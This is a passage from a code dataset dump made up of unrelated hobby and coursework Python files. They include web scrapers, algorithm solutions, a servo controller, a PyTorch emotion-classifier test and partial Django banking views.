is positive!\")\r\nelif negative-sent > positive:\r\n print(\"Article sentiment is positive!\")\r\nelse:\r\n print(\"Article sentiment is neutral\")\r\n\r\n","sub_path":"karp.py","file_name":"karp.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360016508","text":"# BOJ - 8980\nimport sys\nread = sys.stdin.readline\nn, m = map(int, read().split())\narr = [[] for _ in range(n+1)]\nfor _ in range(int(read())):\n a, b, c = map(int, read().split())\n arr[a].append((b, c))\ncap = 0\nans = 0\nl = [0] * (n+1)\nfor i in range(1, n+1):\n ans += l[i]\n cap -= l[i]\n for b, c in sorted(arr[i]):\n if m >= cap + c:\n cap += c\n l[b] += c\n else:\n d = min(m - sum(l[i+1:b+1]), c)\n l[b] += d\n d, cap = 
max(0, cap + d - m), min(m, cap + d)\n for j in range(n, b, -1):\n if d == 0: break\n if l[j] == 0: continue\n dd = min(d, l[j])\n l[j] -= dd\n d -= dd\nprint(ans)\n\"\"\"\n4 40\n6\n3 4 20\n1 2 10\n1 3 20\n1 4 30\n2 3 10\n2 4 20\n\n4 5\n4\n3 4 1\n2 3 4\n1 2 1\n1 4 4\n\"\"\"","sub_path":"2020/2002/200224.py","file_name":"200224.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"316595948","text":"# coding: utf-8\n'''\na proof of concept implementation of SQLite FTS tokenizers in Python\n'''\nimport sys\nimport ctypes\n\nfrom cffi import FFI # type: ignore\n\nfrom typing import Any, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n import sqlite3\n import apsw # type: ignore\nSQLITE3DBHandle = Any # ffi.CData\n\nSQLITE_OK = 0\nSQLITE_DONE = 101\n\nffi = FFI()\n\nif sys.platform == 'win32':\n dll = ffi.dlopen(\"sqlite3.dll\")\nelse:\n from ctypes.util import find_library\n dll = ffi.dlopen(find_library(\"sqlite3\"))\n\nif hasattr(ctypes, 'pythonapi') and \\\n hasattr(ctypes.pythonapi, '_Py_PrintReferences'):\n # for a python built with Py_TRACE_REFS\n ffi.cdef('''\ntypedef struct sqlite3 sqlite3;\ntypedef struct {\n void *_ob_next;\n void *_ob_prev;\n size_t ob_refcnt;\n void *ob_type;\n sqlite3 *db;\n} PyObject;\n''')\nelse:\n ffi.cdef('''\ntypedef struct sqlite3 sqlite3;\ntypedef struct {\n size_t ob_refcnt;\n void *ob_type;\n sqlite3 *db;\n} PyObject;\n''')\n\n\ndef get_db_from_connection(c: 'Union[sqlite3.Connection, apsw.Connection]') -> SQLITE3DBHandle:\n db = getattr(c, '_db', None)\n if db:\n # pypy's SQLite3 connection has _db using cffi\n db = ffi.cast('sqlite3*', db)\n else:\n db = ffi.cast('PyObject *', id(c)).db\n return db\n","sub_path":"sqlitefts/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212952147","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport re\nimport csv\nimport pandas as pd\n\nheaders = {'accept': '*/*',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'}\n\nptype_url = 'https://kaktus.ua/catalog/prazdniki/novyy-god/elochnye-ukrasheniya/?PAGEN_1=1/'\n\ndef ptype_parse(ptype_url, headers):\n product_urls = []\n urls = []\n urls.append(ptype_url)\n session = requests.Session()\n request = session.get (ptype_url, headers=headers)\n if request.status_code == 200:\n soup = bs(request.content, \"lxml\")\n try:\n pagination = soup.find_all('a', attrs={'class': \"center-back-news\"})\n s = (pagination[-2].text.find(\"-\"))\n p = (pagination[-2].text)\n l = (p[s + 1:len(p) - 2])\n count = int(l)\n for i in range(count):\n url = f'https://kaktus.ua/catalog/prazdniki/novyy-god/elochnye-ukrasheniya/?PAGEN_1={i+1}/'\n #print(url)\n if url not in urls:\n urls.append(url)\n except:\n pass\n for url in urls:\n print(url)\n request = session.get(url, headers=headers)\n soup = bs(request.content, \"lxml\")\n data = soup.find_all('div', class_=\"goods-item cfx\")\n for item in data:\n href = item.find('a', attrs={'href': re.compile(\"^/catalog/\")})['href']\n product_urls.append({\"links\": href})\n else:\n print('ERROR or Done.Status Code = ' + str(request.status_code))\n return product_urls\n\n#def files_writer(product_urls):\n# f = open('text.txt', 'w')\n# urls_unique = pd.DataFrame(product_urls).drop_duplicates().to_dict('records')\n# for 
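# --- editorial annotation ---------------------------------------------------
# get_db_from_connection in the tokenizer record above extracts the raw
# sqlite3* handle by casting the connection's PyObject struct. A hedged usage
# sketch (CPython only; the handle is valid only while the connection stays
# open):
#
#     import sqlite3
#     conn = sqlite3.connect(":memory:")
#     db = get_db_from_connection(conn)   # ffi.CData wrapping sqlite3*
#     # db can now be handed to SQLite C APIs through the dlopen'd library,
#     # e.g. to register a custom FTS tokenizer.
#     conn.close()
# -----------------------------------------------------------------------------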
product_url in urls_unique:\n#        f.write(product_url['links'] + '\\n')\n#    f.close()\n\ndef product_parser(product_urls):\n    #session = requests.Session()\n    urls_unique = pd.DataFrame(product_urls).drop_duplicates().to_dict('records')\n    for product_url in urls_unique:\n        print('https://kaktus.ua' + product_url['links'])\n        # request = session.get('https://kaktus.ua' + product_url['links'], headers=headers)\n        # soup = bs(request.content, \"lxml\")\n        # data = soup.find_all('div', class_=\"goods-item cfx\")\n        # for item in data:\n        #     href = item.find('a', attrs={'href': re.compile(\"^/catalog/\")})['href']\n        #     product_urls.append({\"links\": href})\n\n\n\n\nproduct_urls = ptype_parse(ptype_url, headers)\n#files_writer(product_urls)\nproduct_parser(product_urls)\n","sub_path":"ecommerce_scraper.py","file_name":"ecommerce_scraper.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"39010283","text":"def validchar(ch):\n    if ch>='0' and ch<='9':\n        return True\n    if ch=='e' or ch=='.':\n        return True\n    return False\n\ndef removespace(str):\n    index = 0\n    while index < len(str) and str[index] == ' ':\n        index += 1\n    return str[index::]\n\ndef isdigit(ch):\n    return ch >= '0' and ch <= '9'\n\ndef validstr(str):\n    str = removespace(str)\n    if len(str) == 0:\n        return False\n\n    #check first bit\n    if not (isdigit(str[0]) or str[0] == '-'):\n        return False\n    #if the first char is '-' and the second is '0', the third may only be a decimal point\n    if len(str)>=3 and str[0] == '-' and str[1] == '0':\n        if str[2] != '.':\n            return False\n\n    #if the first char is '0', only a decimal point may follow\n    if len(str)>=2 and str[0] == '0':\n        if str[1] != '.':\n            return False\n\n    #advance through the integer part\n    index = 0\n    if str[0] == '-':\n        index += 1\n    while index < len(str):\n        if not isdigit(str[index]):\n            break\n        index += 1\n    #check what follows the integer part\n    if index == len(str):\n        return True\n    elif not (str[index] == 'e' or str[index]=='.'):\n        return False\n\n    #on a decimal point, advance through the fractional part\n    if str[index] == '.':\n        index += 1\n        has_digit = False\n        while index < len(str):\n            if not isdigit(str[index]):\n                break\n            index += 1\n            has_digit = True\n        if not has_digit:\n            return False\n        if index == len(str):\n            return True\n        elif not str[index]=='e':\n            return False\n\n    #enter the exponent part\n    index += 1\n    has_digit = False\n    while index < len(str):\n        if not isdigit(str[index]):\n            return False\n        index += 1\n        has_digit = True\n    if not has_digit:\n        return False\n    return True\n\nif __name__ == \"__main__\":\n    str = input()\n    print(validstr(str))","sub_path":"Code/CodeRecords/2094/61053/279074.py","file_name":"279074.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632881494","text":"from time import sleep\n\nfrom adafruit_servokit import ServoKit\n\n# kit = ServoKit(channels=16)\n\n\nclass NotInCorrectRange(Exception):\n    pass\n\n\nclass ContinuousRotationServo:\n    max_freq = 1900\n    min_freq = 1100\n    middle_point = (max_freq + min_freq) / 2\n    power_multiplier = ((max_freq - min_freq) / 2) / 100\n\n    def __init__(self, kit, pin):\n        print(\"init\")\n        self.control = None\n        self.kit = kit\n        self.pin = pin\n        self.motor_initialize()\n\n    def motor_initialize(self):\n        # self.control = kit.continuous_servo[self.pin]\n        for i in range(0, 10):\n            print(\"startup\", i)\n            self.run_bidirectional(i)\n            sleep(0.1)\n        pass\n\n    def change_power(self, power):\n        \"\"\"\n        :param power: this parameter takes a value between -100 and 100. 
Negative values make it work backward,\n        positive values make it work forward.\n        :return:\n        \"\"\"\n        self.kit.continuous_servo[self.pin].throttle = power / 100\n\n    def run_clockwise(self, power):\n        \"\"\"\n        Pushes the water backward; the motor tries to move forward.\n        :param power:\n        :return:\n        \"\"\"\n        if not 0 <= power <= 100:\n            raise NotInCorrectRange(\"Power must be between 0 and 100.\")\n        return self.change_power(power)\n\n    def run_counterclockwise(self, power):\n        \"\"\"\n        Pushes the water forward; the motor tries to move backward.\n        :param power:\n        :return:\n        \"\"\"\n        if not 0 <= power <= 100:\n            raise NotInCorrectRange(\"Power must be between 0 and 100.\")\n        return self.change_power(-power)\n\n    def run_bidirectional(self, power):\n        if power >= 0:\n            self.run_clockwise(power)\n        else:\n            self.run_counterclockwise(-power)\n\n    def stop(self):\n        return self.change_power(0)\n\n\nif __name__ == '__main__':\n    kit = ServoKit(channels=16)\n    motor = ContinuousRotationServo(kit, 1)\n    max_power = 50\n    for i in range(0, max_power):\n        print(i)\n        motor.run_bidirectional(-i)\n        sleep(0.1)\n    for i in range(max_power, -max_power, -1):\n        print(i)\n        motor.run_bidirectional(-i)\n        sleep(0.1)\n    for i in range(-max_power, 1):\n        print(i)\n        motor.run_bidirectional(-i)\n        sleep(0.1)\n","sub_path":"denemeler/continuous_servo_test.py","file_name":"continuous_servo_test.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519083524","text":"import requests\nfrom Class.category import Category\nfrom Class.product import Product\nfrom Class.relation import Relation\n\n\nclass Request:\n    \"\"\"class allowing queries with the Open Food Facts API,\n    sorting and adding data to the database\"\"\"\n\n    def __init__(self):\n        \"\"\"Request constructor: url and categories\"\"\"\n        self.url = \"https://world.openfoodfacts.org/cgi/search.pl?search_terms={}&search_simple=1&page_size=500&action=process&json=1\"\n        self.categories = [\n            \"Produits fermentés\",\n            \"Jus et nectars\",\n            \"Gelées de fruits\",\n            \"Matières grasses\",\n            \"snacks\",\n        ]\n\n    def create_database(self, database):\n        \"\"\"queries, sorting and adding\"\"\"\n        print(\"Waiting, request in progress ...\")\n        for cat_id, name in enumerate(self.categories):\n            n_prod = 0\n            n_prod_remove = 0\n            n_prod_keep = 0\n            cat_id += 1\n            category = Category(cat_id, name)\n            database.add_category(category.name)\n            print(\"------------------------------------------------------\")\n            print(category.name, \"...waiting...\")\n            print(\"------------------------------------------------------\")\n            response = requests.get(self.url.format(name))\n            resp = response.json()\n            for i in range(500):\n                try:\n                    prod = Product(\n                        resp[\"products\"][i].get(\"nutrition_grades\", \"0\"),\n                        resp[\"products\"][i].get(\"_id\", 0),\n                        resp[\"products\"][i].get(\"product_name_fr\", \"0\"),\n                        resp[\"products\"][i].get(\"url\", \"absent\"),\n                        resp[\"products\"][i].get(\"stores\", \"absent\"),\n                    )\n                    n_prod += 1\n                    checkers = [\n                        3 * 10 ** 12 < int(prod.barcode) < 8 * 10 ** 12,\n                        str(prod.name) != \"0\" and str(prod.name) != \"\",\n                        str(prod.nutriscore) != \"0\",\n                    ]\n                    if all(checkers):\n                        database.add_product(\n                            (prod.nutriscore).upper(),\n                            prod.barcode,\n                            prod.name,\n                            prod.url,\n                            prod.market,\n                        )\n                        n_prod_keep += 1\n                        link = Relation(category.cat_id, prod.barcode)\n                        database.add_relation(link.cat_id, link.barcode)\n                    else:\n                        continue\n                except IndexError:\n                    continue\n            n_prod_ignore = n_prod - n_prod_keep\n            print(f\"{n_prod} 
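# --- editorial annotation ---------------------------------------------------
# change_power in the servo record above maps the user-facing -100..100 range
# onto adafruit_servokit's -1.0..1.0 throttle. A hedged, dependency-free
# sketch of that mapping; the explicit clamp is an addition for illustration,
# not in the original class.
def power_to_throttle(power):
    power = max(-100, min(100, power))    # clamp to the documented range
    return power / 100.0                  # ServoKit throttle expects -1.0..1.0

assert power_to_throttle(50) == 0.5
assert power_to_throttle(-250) == -1.0    # out-of-range input is clamped
# -----------------------------------------------------------------------------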
products collected.\")\n print(f\"{n_prod_ignore} products ignored.\")\n print(f\"{n_prod_keep} products added.\")\n print(\"Request complete.\")\n","sub_path":"api/Database/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"639600737","text":"import requests\nfrom bs4 import BeautifulSoup\n\nmovie_url = input(\"Enter your Movie IMDB URL: \")\npage = requests.get(movie_url)\n\nprint(page)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\n# print(soup)\n#main_top = soup.find(id='main_top')\n# print(main_top)\n\n\nfull_content = soup.find(id=\"wrapper\")\n# Main content\ntitle_bar = full_content.find(class_=\"title_wrapper\")\n# full title bar content\nrating_content = full_content.find(class_='ratings_wrapper')\n# all rating info\nplot_summary = full_content.find(class_='plot_summary')\n#plot_summary = plot_summary_wrapper.find(class_='plot_summary')\n# print(plot_summary)\nstory_line = full_content.find(id='titleStoryLine')\ninline_canwrap = story_line.find(class_='inline canwrap')\n\n\n'''**********************Title and rating ***********************************'''\n# Movie title related all info start:\nvideo_title = title_bar.find('h1').get_text()\n# show video title and publish year\nvideo_info = title_bar.find(class_='subtext')\n# print(video_info)\n# video extra info\nvideo_length = video_info.find('time').get_text()\n# show Total Video Length\n\n\nrelease_date = video_info.find(title=\"See more release dates\").get_text()\n# Movie title related all info end:\n\n'''*******************************Rating ******************************************'''\nrating = rating_content.find(itemprop='ratingValue').get_text()\nbest_rating = rating_content.find(itemprop='bestRating').get_text()\nrating_count = rating_content.find(itemprop='ratingCount').get_text()\n\n'''******************************* Description ****************************************'''\n# Extra info Movie:\ndescription = inline_canwrap.find('span').get_text()\n# Show Description\n\ndirector_info = plot_summary.find_all(class_='credit_summary_item')[0]\ndirector = director_info.find('a').get_text()\n# show director info\n\nwriter_info = plot_summary.find_all(class_='credit_summary_item')[1]\nwriter = writer_info.find('a').get_text()\n# show Writter info\n\nstars_info = plot_summary.find_all(class_='credit_summary_item')[2]\n#stars = stars_info.find('a').get_text()\nlength_stars_name = len(stars_info.find_all('a'))\n# show stars info\n\n\n'''********************************Show All extract Info********************************* '''\n# all print function goes here\nprint(\"Movie Name and Publish Year:\", video_title)\nprint(\"Total Video Length:\", video_length)\nlength_movie_type = len(video_info.find_all('a'))\n#print(\"test:\", length_movie_type)\nfor i in range(length_movie_type-1):\n # video type\n print(\"Movie Type:\", video_info.find_all('a')[i].get_text())\n\nprint(\"Release Date:\", release_date)\nprint(\"Rating:\", rating)\nprint(\"Height Rating:\", best_rating)\nprint(\"Rating Count:\", rating_count)\nprint(\"Description:\", description)\nprint(\"Director:\", director)\nprint(\"Writer:\", writer)\n\n#print(\"Stars:\", length_stars_name)\n\nfor j in range(length_stars_name-1):\n print(\"Stars:\", 
stars_info.find_all('a')[j].get_text())\n","sub_path":"movies/test_imdb1.py","file_name":"test_imdb1.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166352008","text":"#Tenisce Richelieu\n\n#Your algorithm should go here OR you should use comments throughout\n\n#Your code goes here\n    #Tenisce Richelieu\nimport tkinter\nimport tkinter.messagebox\n#as box\n\nclass FahrenConverterGUI:\n    def __init__(self):\n        #Create the main window\n        self.main_window = tkinter.Tk()\n\n        #Create two frames to group widgets\n        self.top_frame = tkinter.Frame(self.main_window)\n        self.bottom_frame = tkinter.Frame(self.main_window)\n\n        #Create widgets for the top frame: a prompt label and an entry box\n        self.prompt_label = tkinter.Label(self.top_frame, text = \"Enter a Fahrenheit temp: \")\n        self.f_entry = tkinter.Entry(self.top_frame, width = 10)\n\n        #Pack the top frame's widgets, then create widgets for the bottom frame\n        self.prompt_label.pack(side = 'left')\n        self.f_entry.pack(side = 'left')\n        self.calc_button = tkinter.Button(self.bottom_frame, text = \"Calculate\", command = self.convert)\n        self.quit_button = tkinter.Button(self.bottom_frame, text = 'Quit', command = self.main_window.destroy)\n\n        #Pack the bottom frame's widgets\n        self.calc_button.pack(side = 'left')\n        self.quit_button.pack(side = 'left')\n\n        #Pack the frames\n        self.top_frame.pack()\n        self.bottom_frame.pack()\n    \n    def convert(self):\n        #Get the value entered by the user into the f widget\n        f = float(self.f_entry.get())\n\n        #Convert Fahrenheit to Celsius\n        c = (f - 32) * 5/9\n\n        #Display the results in an info dialog box\n        tkinter.messagebox.showinfo('Results', str(f) + ' Fahrenheit is equal to ' + str(c) + ' Celsius.')\n    \ntemp_converter = FahrenConverterGUI()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556451427","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Sarah Abney\nDate : 5 February 2020\nPurpose: Homework 1 \n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\n\n\n# --------------------------------------------------\ndef get_args():\n    \"\"\"Get arguments\"\"\"\n\n    parser = argparse.ArgumentParser(\n        description=\"Homework1\",\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument('vowel', \n                        metavar='vowel',\n                        help='vowel = A vowel to search for', \n                        type=str, \n                        choices= ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n\n    parser.add_argument('text',\n                        metavar='text',\n                        help='text= The text to show')\n\n    return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n    \"\"\"The fun stuff\"\"\"\n\n    args = get_args()\n    text = args.text\n    vowel = args.vowel\n    \n    if vowel in text:\n        print(f'Found \"{vowel}\" in \"{text}\" at index {text.index(vowel)}.')\n    else: \n        print(f'\"{vowel}\" is not found in \"{text}\".')\n    \n# --------------------------------------------------\nif __name__ == '__main__':\n    main()\n","sub_path":"assignments/01_strings/vpos.py","file_name":"vpos.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546848825","text":"from pydash import *\n\nf = open('d.txt')\n\nL = []\n\nread_lines = f.readlines()\nfor line in read_lines:\n    L.append(str(line).replace('\\n', 
'').split(' '))\n\nf.close()\n\n\nnew_L = []\nfor i in range(int(L[0][1])):\n    for line in L[1:]:\n        if line[1] == str(i):\n            new_L.append(line)\nnew_L\n\nnum_nodes = map_(new_L, lambda x: x[1])\nnodes = []\n\nfor n in range(int(L[0][1])):\n    nodes.append([n, num_nodes.count(str(n))])\n\n\nant = 0\ntmp = 0\nstring_da_vitoria = str(L[0][1]) + \"\\n\"\n\n\nfor i in range(len(nodes)):\n    string_da_vitoria += str(nodes[i][0]) + \"\\n\" + str(nodes[i][1]) + \"\\n\"\n    for line in new_L[ant:ant+nodes[i][1]]: \n        string_da_vitoria += line[2] + \" 1\\n\"\n    ant += nodes[i][1]\n\nfile_vitoria = open(\"d_submission.txt\", \"w\")\nfile_vitoria.write(string_da_vitoria)\nfile_vitoria.close()","sub_path":"solutions/d_code.py","file_name":"d_code.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631239742","text":"# -*- coding: utf-8 -*-\n# read the word (at most 1,000,000 characters)\nverb = input()\nif len(verb) > 1000000:\n    print(\"input length exceeded\")\n    exit()\n\n# build a letter:count hash and count each letter\nalphabet = dict()\nfor i in range(97, 123):\n    alphabet[chr(i)] = 0\n\nfor i in list(verb.lower()):\n    alphabet[i] += 1\n\nret = 0\ncol = 0\nfor y in alphabet:\n    if ret < alphabet[y]:\n        ret = alphabet[y]\n        col = y.upper()\n    elif ret == alphabet[y]:\n        col = '?'\n\nprint(col)","sub_path":"baekjoon/1157-단어공부/jhwmon.py","file_name":"jhwmon.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61137263","text":"import os\nimport pandas as pd \nimport glob\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nimport pickle\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\n\n# Load audio MFCC\nMFCC = (np.load(\"FC_MFCC12EDA.npy\")).transpose(0,2,1) # Transpose\ndata_train = MFCC[0:int(MFCC.shape[0]*0.9)]\ndata_test = MFCC[int(MFCC.shape[0]*0.9):]\n# Load label\nfile=open(\"FC_label.txt\")\nlines=file.readlines()\nlabel = []\nfor line in lines:\n    line = line.strip().split('\\n')\n    label.append(line)\nlabel_int = (np.array(label)[:,0]).astype(int)\nlabel_train = label_int[0:int(MFCC.shape[0]*0.9)]\nlabel_test = label_int[int(MFCC.shape[0]*0.9):]\naudio_data_train_tensor = Variable(torch.tensor(data_train),requires_grad = False)\naudio_data_test_tensor = Variable(torch.tensor(data_test),requires_grad = False)\naudio_label_train_tensor = Variable(torch.tensor(label_train),requires_grad = False)\naudio_label_test_tensor = Variable(torch.tensor(label_test),requires_grad = False)\n\nimport pandas as pd\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\ndata = pd.read_csv(\"sentence_label_comb.csv\").dropna().reset_index(drop=True)\nsentence_length = []\nfor i in range(len(data)):\n    length = len(data.sentence[i].split())\n    sentence_length.append(length)\n\nsentence = []\nlabel = []\nfor i in range(len(data)):\n    sentence.append(data.sentence[i])\n    label.append(data.label[i])\n    \n#train_sentence = sentence[0: int(len(data)*0.6)]\n#train_label = label[0: int(len(data)*0.6)]\n\n#val_sentence = sentence[int(len(data)*0.6):int(len(data)*0.8)]\n#val_label = label[int(len(data)*0.6):int(len(data)*0.8)]\n\ntrain_sentence = sentence[0: int(len(data)*0.9)]\ntrain_label = label[0: int(len(data)*0.9)]\n\ntest_sentence = sentence[int(len(data)*0.9):]\ntest_label = 
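# --- editorial annotation ---------------------------------------------------
# The BOJ 1157 record above counts letters with a hand-built dict. A hedged
# standard-library equivalent of the count-and-tie-break logic (illustrative,
# not the original submission):
from collections import Counter

def most_common_letter(word):
    counts = Counter(word.lower())
    (top, n), = counts.most_common(1)
    ties = [c for c, k in counts.items() if k == n]
    return '?' if len(ties) > 1 else top.upper()

assert most_common_letter("Mississipi") == "?"    # 'i' and 's' tie at 4
assert most_common_letter("zZa") == "Z"
# -----------------------------------------------------------------------------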
label[int(len(data)*0.9):]\n\nvocab_list = []\nfor i in sentence:\n    for j in i.split():\n        if j not in vocab_list:\n            vocab_list.append(j)\n# len(vocab_list)\n# 3147\n# since the vocabulary size of the sentences is 3147, I pick the\n# 3000 most common words\ntokenizer = Tokenizer(num_words=3000, oov_token='<OOV>')\ntokenizer.fit_on_texts(train_sentence)\nword_index = tokenizer.word_index\n\ntrain_sequence = tokenizer.texts_to_sequences(train_sentence)\ntrain_sequence = pad_sequences(train_sequence, maxlen = 35, padding='post', truncating='post')\n\n#val_sequence = tokenizer.texts_to_sequences(val_sentence)\n#val_sequence = pad_sequences(val_sequence, maxlen = 35, padding='post', truncating='post')\n\ntest_sequence = tokenizer.texts_to_sequences(test_sentence)\ntest_sequence = pad_sequences(test_sequence, maxlen = 35, padding='post', truncating='post')\n\ntext_data_train_tensor = Variable(torch.tensor(train_sequence),requires_grad = False)\ntext_label_train_tensor = Variable(torch.tensor(train_label),requires_grad = False)\ntext_data_test_tensor = Variable(torch.tensor(test_sequence),requires_grad = False)\ntext_label_test_tensor = Variable(torch.tensor(test_label),requires_grad = False)\n\nclass model(nn.Module):\n    def __init__(self):\n        super(model, self).__init__()\n        \n        self.conv0 = nn.Sequential(nn.Conv1d(in_channels=39, out_channels=10, kernel_size = 4),nn.ReLU())\n        self.lstm_audio = nn.LSTM(input_size=10, hidden_size=16, batch_first = True, bidirectional = True)\n        self.fc0 = nn.Sequential(nn.Flatten(start_dim = 1, end_dim = -1),nn.Linear(in_features = 23904, out_features = 4))\n        \n        vocab_size = 3000\n        embedding_dim = 64\n        self.embedding1 = nn.Embedding(vocab_size, embedding_dim)\n        self.lstm1 = nn.LSTM(input_size = embedding_dim, hidden_size = 100,\n                            dropout = 0.2, bidirectional = True, batch_first=True)\n        self.dropout1 = nn.Dropout(0.3)\n        self.fc1 = nn.Sequential(\n            nn.Flatten(start_dim = 1, end_dim = -1),\n            nn.Linear(in_features = 3500*2, out_features = 4)\n        )\n        self.final = nn.Sequential(nn.Linear(in_features = 8, out_features = 4), nn.Softmax(dim =1))\n        \n    def forward(self,x,y):\n        Conv_out0 = self.conv0(x)\n        LSTM_out0,_ = self.lstm_audio(Conv_out0.transpose(1,2))\n        FC_out0 = self.fc0(LSTM_out0)\n        y = y.long()\n        embeds1 = self.embedding1(y)\n        lstm_out1, _ = self.lstm1(embeds1)\n        drop_out1 = self.dropout1(lstm_out1)\n        FC_out1 = self.fc1(drop_out1)\n        final_input = torch.cat((FC_out0, FC_out1), dim=1)\n        output = self.final(final_input)\n        #output = nn.Linear(final_input, out_features=4)\n        return output\n\nModel_r = model()\nModel_r.load_state_dict(torch.load('model_trained.pkl')) \nModel_r.eval()\noutputs = Model_r(audio_data_test_tensor.float(),text_data_test_tensor)\n_, y_pred = outputs.max(dim=1)\naccuracy = int(sum(y_pred == audio_label_test_tensor))/len(text_label_test_tensor)\nprint(\"test accuracy: {:.2f}\".format(accuracy))\nmat = np.zeros(shape=(4,4))\nmat_new = np.zeros(shape=(4,4))\nfor i in range(0,len(text_label_test_tensor)):\n    m = text_label_test_tensor[i]\n    n = y_pred[i]\n    mat[m,n] = mat[m,n] + 1\n\nfor i in range(4):\n    mat[i,:] = mat[i,:]/sum(mat[i,:])\nimport seaborn as sns\nimport matplotlib as mpl\nsns.set(style = \"whitegrid\",color_codes = True)\n#np.random.seed(sum(map(ord,\"categorical\")))\n#df_corr = someDataFrame.corr()\nax = sns.heatmap(mat, annot=True) #notation: \"annot\" not \"annote\"\nbottom, top = ax.get_ylim()\nax.set_ylim(bottom + 0.5, top - 0.5)\n#heatmap = sns.heatmap(mat,annot = True)\nplt.show()\n#accuracy = int(sum(y_pred == 
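# --- editorial annotation ---------------------------------------------------
# The loop above builds a row-normalized confusion matrix by hand. For
# reference, scikit-learn (>= 0.22) can produce the same matrix directly;
# this is an alternative, not what the original script uses:
#
#     from sklearn.metrics import confusion_matrix
#     mat = confusion_matrix(text_label_test_tensor, y_pred,
#                            labels=[0, 1, 2, 3], normalize='true')
# -----------------------------------------------------------------------------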
audio_label_test_tensor))/len(text_label_test_tensor)\n#print(\"test accuray: {:.2f}\".format(accuracy))\n","sub_path":"ATM_test.py","file_name":"ATM_test.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290973456","text":"# Create your views here.\nfrom django.shortcuts import render_to_response\nfrom cooperative_Bank.financial_management.models import account\nfrom cooperative_Bank.financial_management.models import Customer\nfrom cooperative_Bank.financial_management.models import MutualFund\nfrom cooperative_Bank.financial_management.models import IPO\nfrom cooperative_Bank.financial_management.models import FO\nfrom django.http import HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom django.utils import simplejson\n\nuser_name = None\nuser_id1 = None\ntot_bal1= None\nmf_bal1= None\npo_bal1= None\nfo_bal1= None\nnw_bal1= None\nmfid=None\np=None\ncounter=None\nquantity=None\nprice=None\ntotal=None\n#def print_vars():\n# print user_name\n# print user_id1\n# print tot_bal1\n# print mf_bal1\n# print po_bal1\n# print fo_bal1\n# print nw_bal1\n\ndef login_page(request):\n return render_to_response(\"login.html\")\n\ndef account_detail(request):\n user_id = request.POST[\"user_id\"] \n try: \n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n user = account.objects.get(pk=user_id)\n customer = Customer.objects.get(pk=user_id)\n user_name = customer.customer_Name\n user_id1 = user.user_id\n tot_bal1= int(user.tot_bal)\n mf_bal1= int(user.mf_bal)\n po_bal1= int(user.po_bal)\n fo_bal1= int(user.fo_bal)\n nw_bal1 =(tot_bal1)-(mf_bal1+po_bal1+fo_bal1)\n return render_to_response(\"accountpage.html\",{\"user_id1\":user_id1 , \"mf_bal1\":mf_bal1 , \"tot_bal1\":tot_bal1 , \"po_bal1\":po_bal1 ,\"fo_bal1\": fo_bal1, \"user_name\":user_name,\"nw_bal1\":nw_bal1})\n\n except account.DoesNotExist:\n return HttpResponseRedirect(\"/cooperative_Bank/\")\n\n \n##if view is MF show him MF page ,IPO show ipo.htm, FO fo.html else error\ndef mf_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global p\n counter = 0\n mf_list = MutualFund.objects.all()\n return render_to_response('mf.html',{'mf_list':mf_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"mf_bal1\":mf_bal1 ,\"nw_bal1\":nw_bal1,\"mfid\":mfid,\"p\":p,\"counter\":counter})\n\ndef ipo_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global 